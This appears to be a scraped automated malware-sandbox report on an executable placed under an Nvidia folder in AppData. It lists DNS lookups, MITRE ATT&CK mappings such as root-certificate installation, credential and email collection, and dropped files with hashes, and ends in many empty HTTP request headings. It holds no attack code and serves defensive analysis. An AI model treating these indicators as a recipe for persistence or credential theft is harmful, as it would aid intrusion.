B9a5797cb584014f3fede.exe

61 B
91 B
1
1

DNS Request

www.pornhub.com

DNS Response

66.254.114.41
8.8.8.8:53

apps.identrust.com

dns

B9a5797cb584014f3fede.exe

64 B
165 B
1
1

DNS Request

apps.identrust.com

DNS Response

88.221.25.169

88.221.25.153
8.8.8.8:53

www.eset.com

dns

B9a5797cb584014f3fede.exe

58 B
204 B
1
1

DNS Request

www.eset.com

DNS Response

23.72.252.139

23.72.252.169

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
87cc804f6e73530988948ebe47d975d5

SHA1
dbf42b40ae3c0e3843c86822ce20707e1e5df516

SHA256
d427c0c4bf1beb96329e6ba2d36465a6adb52835f54d65fd014de4e12f394c30

SHA512
8f8bb14e057db83c51fa211794de4732e7b2f2966138c8d32954e8d87d851cc83d36fce69b422d7391cd1ce5a2707911d69383586a92306f744780db149dadf5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
29208f21708f4ef952fd34ec344ff543

SHA1
b62648136a0a85e072eef0b61780617c85dd47f6

SHA256
b1460e692cf321b551b5c59985366cce16f5b95733a2b3429e34cc97f80e30bd

SHA512
8592c7cf8fd24242d4f0fea19ccb7255cd84548d2f2412ec2d1ceb20802a46f536c71503c8d0a9925dea1c3505544d458ce3e7399c7fcf7fa9a0422b57b1943e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
f90087d2936cef6801995f27da4e96d1

SHA1
782166adfec0f45da26a0b6009e88ffc1b736406

SHA256
bfbcebf3bb9e4d032a16728eed2822eaf50e3eed98d9f930591f58217316eac6

SHA512
e6163d04fd47788d8e7baffb0de2084ff3de59ba03db9e48fe56da93a9d232a9cf5f00265edf84eca5a88dda54a6355b2e44cdaf09da289d668967f886bbfa1a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
d91c538098a7de47b5c41190987f010f

SHA1
8f07e34c5f0284e273ba27a4434fef5e930fc41d

SHA256
08fee11887c2052f2e862df9cf7c347dc655155498d6cf9fa9497a6e397c2e6c

SHA512
d6b4ddf57fac663a7a70f8d83b67fa801c62b2b9944e627dd946c6cb71c828df4577b3645c1df575cc5e5c8d5dbc08c139edcd20cf2c6f08073238d2ee288cc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
20b157d9eaf2636a1e3c9b4437e1d433

SHA1
f53c82a58b2b67568a1e749ffa2cc9d465a4f6d7

SHA256
ea4e3622546c56be93d968c71927264ec324d6c0f7734eaca4846ed8f35e4db6

SHA512
51eb58f18c9c0582f18009f4c277a74cb32206279a5f3a45b11a84549d6b2c8db7a274f5f726247016043bfe3b6d99fbd9190b4f5cebc417f4ba5d44d90373cb

Download Submit
C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe

Filesize
530KB

MD5
862e7aeb18ba5892f51b5712a213a614

SHA1
99d86e4247f52c3ea9b2bb476af66dfc7707fa8d

SHA256
44eca198c64197c511441f644895afd6a2777c28bcb6a376d4d4623b030ced31

SHA512
678fc8fb5dc887f41db90e6341229ce35c830ffac4cbb91ea669ab5e8bc849bae05c15909ae62e4dfd3a249bb2ff062eaa0e256989fe203863db0396c60ec713

Download Submit
C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe

Filesize
530KB

MD5
862e7aeb18ba5892f51b5712a213a614

SHA1
99d86e4247f52c3ea9b2bb476af66dfc7707fa8d

SHA256
44eca198c64197c511441f644895afd6a2777c28bcb6a376d4d4623b030ced31

SHA512
678fc8fb5dc887f41db90e6341229ce35c830ffac4cbb91ea669ab5e8bc849bae05c15909ae62e4dfd3a249bb2ff062eaa0e256989fe203863db0396c60ec713

Download Submit
C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe

Filesize
530KB

MD5
862e7aeb18ba5892f51b5712a213a614

SHA1
99d86e4247f52c3ea9b2bb476af66dfc7707fa8d

SHA256
44eca198c64197c511441f644895afd6a2777c28bcb6a376d4d4623b030ced31

SHA512
678fc8fb5dc887f41db90e6341229ce35c830ffac4cbb91ea669ab5e8bc849bae05c15909ae62e4dfd3a249bb2ff062eaa0e256989fe203863db0396c60ec713

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7996.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar79B8.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Local\gzrj1xdnai\port.dat

Filesize
4B

MD5
5460b9ea1986ec386cb64df22dff37be

SHA1
f0d3a40df85181963127fe7f43181d78cc478fbc

SHA256
7263af08814e11782e313d81492e2c644c3152b0f42deeff9c0efa80667b5094

SHA512
8816afaa6e093847d81322fbaccb1e85313da2910750a2416dccf735651ec78f703ff37ff5b5e597fda56ae8fd905aa5c4a3c3090768c606c5d67b9787c4712a

Download Submit
memory/2400-171-0x000000001B440000-0x000000001B4C0000-memory.dmp

Filesize
512KB

Download
memory/2400-169-0x000007FEF4FA0000-0x000007FEF598C000-memory.dmp

Filesize
9.9MB

Download
memory/2400-199-0x000007FEF4FA0000-0x000007FEF598C000-memory.dmp

Filesize
9.9MB

Download
memory/2400-200-0x000000001B440000-0x000000001B4C0000-memory.dmp

Filesize
512KB

Download
memory/2552-5-0x000007FEF5990000-0x000007FEF637C000-memory.dmp

Filesize
9.9MB

Download
memory/2552-0-0x0000000000DA0000-0x0000000000E2A000-memory.dmp

Filesize
552KB

Download
memory/2552-2-0x000000001B0C0000-0x000000001B140000-memory.dmp

Filesize
512KB

Download
memory/2552-1-0x000007FEF5990000-0x000007FEF637C000-memory.dmp

Filesize
9.9MB

Download
memory/2808-11-0x000000001B310000-0x000000001B390000-memory.dmp

Filesize
512KB

Download
memory/2808-10-0x000007FEF4FA0000-0x000007FEF598C000-memory.dmp

Filesize
9.9MB

Download
memory/2808-9-0x0000000001100000-0x000000000118A000-memory.dmp

Filesize
552KB

Download
memory/2808-170-0x000007FEF4FA0000-0x000007FEF598C000-memory.dmp

Filesize
9.9MB

Download
memory/2808-173-0x000000001B310000-0x000000001B390000-memory.dmp

Filesize
512KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request